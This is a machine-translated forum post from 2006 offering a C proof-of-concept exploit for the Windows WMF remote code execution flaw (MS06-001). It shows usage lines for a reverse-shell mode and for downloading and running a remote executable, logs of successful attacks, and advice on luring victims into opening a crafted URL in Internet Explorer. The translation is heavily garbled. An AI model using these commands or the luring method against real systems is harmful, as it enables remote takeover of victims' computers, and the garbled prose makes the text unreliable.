ms0601wmf file remote code execution using the program invincible Edition-vulnerability warning-the black bar safety net

2006-01-14T00:00:00
ID MYHACK58:6220066341
Type myhack58
Reporter 佚名
Modified 2006-01-14T00:00:00

Description

I haven't made an original, don't send going to be the ice blood it Ah to the SM:-the wmf File format vulnerability out for so long, only recently have time to study it. Presumably this vulnerability also attracted a lot of eyeballs. metasploit really cattle Ah, the launch of the Trojan are always so timely and effective。。。。 Idle all right, it changed to the C Version, the program to run help as follows:

QUOTE:

Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

P. O. C VERSION

codez by superlone@EST

Usage: wmfexp

shell type <====> 1: <====>

e. g: wmfexp 1 192.168.1.111 8 0 8 0 192.168.1.111 1 3 1 4

shell type <====> 2: <====>

e. g: wmfexp 2 192.168.1.111 8 0 8 0 http://www.eviloctal.com/superlone.exe

^_^ SHOW my love to LiuHui,for EVER and EVER!!!!

One can understand, I don't need to say more? The reverse overflow of the examples are as follows:

QUOTE:

E:\temp\Release>wmfexp 1 192.168.1.111 8 0 8 0 192.168.1.111 1 3 1 4 Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

P. O. C VERSION written by superlone@EST

^_^MY love goes to my wife for EVER and EVER

^^binding 192.168.1.111 on port 8 0 8 0 with socket ...DONE! ^^waiting for connection of ANY. WMF request ...GOT IT! ^^connection received from 192.168.1.3 on port 4 2 2 4 9 ^^generating payload ...DONE! ^^sending crafted data to the remote host 192.168.1.3 ...DONE! ^^do i work well?-)

Looking at the results of the drawings.


! Download the implementation of the examples are as follows:

QUOTE:

E:\temp\Release>wmfexp 2 192.168.1.111 8 0 8 0 http://www.huibian.com/wmf/wmf.exe Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

P. O. C VERSION written by superlone@EST

^_^MY love goes to my wife for EVER and EVER

^^binding 192.168.1.111 on port 8 0 8 0 with socket ...DONE! ^^waiting for connection of ANY. WMF request ...GOT IT! ^^connection received from 192.168.1.3 on port 4 3 5 2 9 ^^generating payload ...DONE! ^^sending crafted data to the remote host 192.168.1.3 ...DONE! ^^do i work well?-)


!


! The results are shown in the accompanying drawings and...

Since the POC version so I did not optimize the shellcode, so after some time publish a code we can change it!!!

PS: the I'm on sp2 on is also a successful test, don't know if you know the test method does not? 8 0 8 0 port is locally bound port, disguised as a http server, if this port is already a program using the program will appear“..._ error:the bind operation fail ed”, didn't use the port complex. In addition to this vulnerability program of use is not there are many friends don't understand Oh, when the program appears“^_^waiting for connection of ANY. WMF request...”, the description of the exploit has been run successfully and have been listening in, you set the port A as 8 0 8 0 this time requires you to play to your imagination to think of a way to let each other in IE to access your URL, don't know your url? Strange I forgot to tell you, if the other party access to such url: http:// 你 的 IP: you listening port/any. wmf

You will be caught, in which your IP needless to say, right? The external network use of the words certainly have a public IP。。。。 Your listening port is the camouflage of the http server port, in the example is 8 0 8 0 port. any. wmf is any document, whatever you write it, but the suffix must be the following one: dib emf wmf bmp tiff For example this url: http://192.168.1.111:8080/mylove.tiff As long as there are loopholes in the host using IE to open the above URL will be identified.。。。。 In addition, I test with a windows button expert screenshots, that's in the xp sp1 machine accessing my url after a successful download performed.

Understand? My program provides the reverse connection and download performs two functions, it is recommended you use the download to perform and... Why? You Ah find to Then to show that the release of this app is P. O. C version, so there is no http request packet for analysis, such as determine whether the target machine is not xp or above system. Need the source code you can find I want, or a couple of days it is published. Also don't understand I can't, the cub said, my language expression ability is very strong。。。。

Note: the test url to use after the extension, only the following may be several in one: dib emf wmf bmp tiff